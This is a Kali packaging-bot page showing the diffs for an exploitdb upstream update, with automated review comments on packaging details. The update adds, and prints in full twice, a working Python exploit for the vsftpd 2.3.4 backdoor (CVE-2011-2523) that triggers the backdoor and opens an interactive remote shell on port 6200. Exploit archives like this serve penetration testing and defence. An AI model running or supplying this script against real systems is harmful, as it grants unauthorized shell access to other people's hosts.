Run of fresh-releases for exploitdb

Try this locally:

debcheckout exploitdb
cd exploitdb
new-upstream --debian-revision=0kali1

Summary

new-upstream --debian-revision=0kali1

Diff

Branch: pristine-tar

diff --git a/exploitdb_20210413.orig.tar.gz.delta b/exploitdb_20210413.orig.tar.gz.delta
new file mode 100644
index 000000000..6c1fe331d
Binary files /dev/null and b/exploitdb_20210413.orig.tar.gz.delta differ
diff --git a/exploitdb_20210413.orig.tar.gz.id b/exploitdb_20210413.orig.tar.gz.id
new file mode 100644
index 000000000..5c9a1ef8c
--- /dev/null
+++ b/exploitdb_20210413.orig.tar.gz.id
@@ -0,0 +1 @@
+e75c640fa62e9e5499cb42384f8111e03ad427f8

Branch: upstream

Tag: upstream/20210413
diff --git a/exploits/unix/remote/49757.py b/exploits/unix/remote/49757.py
new file mode 100755
index 000000000..e8b888c5e
--- /dev/null
+++ b/exploits/unix/remote/49757.py
@@ -0,0 +1,40 @@
+# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
+# Date: 9-04-2021
+# Exploit Author: HerculesRD
+# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
+# Version: vsftpd 2.3.4
+# Tested on: debian
+# CVE : CVE-2011-2523
+
+#!/usr/bin/python3   
+                                                           
+from telnetlib import Telnet 
+import argparse
+from signal import signal, SIGINT
+from sys import exit
+
+def handler(signal_received, frame):
+    # Handle any cleanup here
+    print('   [+]Exiting...')
+    exit(0)
+
+signal(SIGINT, handler)                           
+parser=argparse.ArgumentParser()        
+parser.add_argument("host", help="input the address of the vulnerable host", type=str)
+args = parser.parse_args()       
+host = args.host                        
+portFTP = 21 #if necessary edit this line
+
+user="USER nergal:)"
+password="PASS pass"
+
+tn=Telnet(host, portFTP)
+tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
+tn.write(user.encode('ascii') + b"\n")
+tn.read_until(b"password.") #if necessary, edit this line
+tn.write(password.encode('ascii') + b"\n")
+
+tn2=Telnet(host, 6200)
+print('Success, shell opened')
+print('Send `exit` to quit shell')
+tn2.interact()
\ No newline at end of file
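Review bot: the interpreter line `#!/usr/bin/python3` is on line 9 of the new file, below the header comments, so it is treated as an ordinary comment and has no effect even though the file is added with mode 100755. Either move it to the first line or drop the executable bit so the mode matches how the script actually has to be started. The file also ends without a trailing newline, as the last marker of the hunk shows.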
diff --git a/files_exploits.csv b/files_exploits.csv
index 175338e5b..4dddecebe 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18439,6 +18439,7 @@ id,file,description,date,author,type,platform,port
 49745,exploits/multiple/remote/49745.js,"Google Chrome 86.0.4240 V8 - Remote Code Execution",2021-04-06,r4j0x00,remote,multiple,
 49746,exploits/multiple/remote/49746.js,"Google Chrome 81.0.4044 V8 - Remote Code Execution",2021-04-06,r4j0x00,remote,multiple,
 49754,exploits/linux/remote/49754.c,"Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution",2021-04-08,"Google Security Research",remote,linux,
+49757,exploits/unix/remote/49757.py,"vsftpd 2.3.4 - Backdoor Command Execution",2021-04-12,HerculesRD,remote,unix,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
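Review bot: the date in the added row for 49757 is `2021-04-12`, while the header of `exploits/unix/remote/49757.py` in the same update says `# Date: 9-04-2021`. If the CSV column is meant to be the database publication date and the header the author's date, that is fine but worth stating in the upstream documentation; otherwise one of the two should be corrected so that tooling that keys on the index date agrees with the file.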

Branch: main

diff --git a/debian/changelog b/debian/changelog
index 991a2b841..e099c8bdd 100644
--- a/debian/changelog
+++ b/debian/changelog
@@ -1,3 +1,9 @@
+exploitdb (20210413-0kali1) UNRELEASED; urgency=low
+
+  * New upstream release.
+
+ -- Kali Janitor <janitor@kali.org>  Tue, 13 Apr 2021 12:28:25 -0000
+
 exploitdb (20210410-0kali1) kali-dev; urgency=medium
 
   * Upstream update
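Review bot: the new stanza is left at `UNRELEASED; urgency=low`, while the previous entry was uploaded as `kali-dev; urgency=medium`. The distribution has to be set to the real target before upload, and the drop in urgency should be deliberate rather than a tool default. The entry text `New upstream release.` also differs from the `Upstream update` wording used in the entry below it; pick one form so the changelog stays greppable.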
diff --git a/exploits/unix/remote/49757.py b/exploits/unix/remote/49757.py
new file mode 100755
index 000000000..e8b888c5e
--- /dev/null
+++ b/exploits/unix/remote/49757.py
@@ -0,0 +1,40 @@
+# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
+# Date: 9-04-2021
+# Exploit Author: HerculesRD
+# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
+# Version: vsftpd 2.3.4
+# Tested on: debian
+# CVE : CVE-2011-2523
+
+#!/usr/bin/python3   
+                                                           
+from telnetlib import Telnet 
+import argparse
+from signal import signal, SIGINT
+from sys import exit
+
+def handler(signal_received, frame):
+    # Handle any cleanup here
+    print('   [+]Exiting...')
+    exit(0)
+
+signal(SIGINT, handler)                           
+parser=argparse.ArgumentParser()        
+parser.add_argument("host", help="input the address of the vulnerable host", type=str)
+args = parser.parse_args()       
+host = args.host                        
+portFTP = 21 #if necessary edit this line
+
+user="USER nergal:)"
+password="PASS pass"
+
+tn=Telnet(host, portFTP)
+tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
+tn.write(user.encode('ascii') + b"\n")
+tn.read_until(b"password.") #if necessary, edit this line
+tn.write(password.encode('ascii') + b"\n")
+
+tn2=Telnet(host, 6200)
+print('Success, shell opened')
+print('Send `exit` to quit shell')
+tn2.interact()
\ No newline at end of file
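Review bot: `from telnetlib import Telnet` ties this file to a module that was deprecated in Python 3.11 and removed in Python 3.13 (PEP 594), so on a current interpreter the import fails before anything else runs. Since the package ships the file as-is from upstream, record the interpreter constraint for this entry or raise it upstream. This copy on the main branch has the same blob id (`e8b888c5e`) as the one on the upstream branch, so any fix needs to land upstream and be re-imported rather than patched here.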
diff --git a/files_exploits.csv b/files_exploits.csv
index 175338e5b..4dddecebe 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18439,6 +18439,7 @@ id,file,description,date,author,type,platform,port
 49745,exploits/multiple/remote/49745.js,"Google Chrome 86.0.4240 V8 - Remote Code Execution",2021-04-06,r4j0x00,remote,multiple,
 49746,exploits/multiple/remote/49746.js,"Google Chrome 81.0.4044 V8 - Remote Code Execution",2021-04-06,r4j0x00,remote,multiple,
 49754,exploits/linux/remote/49754.c,"Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution",2021-04-08,"Google Security Research",remote,linux,
+49757,exploits/unix/remote/49757.py,"vsftpd 2.3.4 - Backdoor Command Execution",2021-04-12,HerculesRD,remote,unix,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
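Review bot: the trailing `port` column of the added 49757 row is empty although the script hard-codes `portFTP = 21`. The neighbouring rows in this hunk leave the column empty as well, so this matches current practice, but filling in the service port where the file states one would make the index usable for filtering by exposed service when triaging which entries apply to a given host.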

Publish History

Resulting package

The resulting binary packages can be installed (if you have the apt repository enabled) by running one of:

apt install -t kali-experimental exploitdb
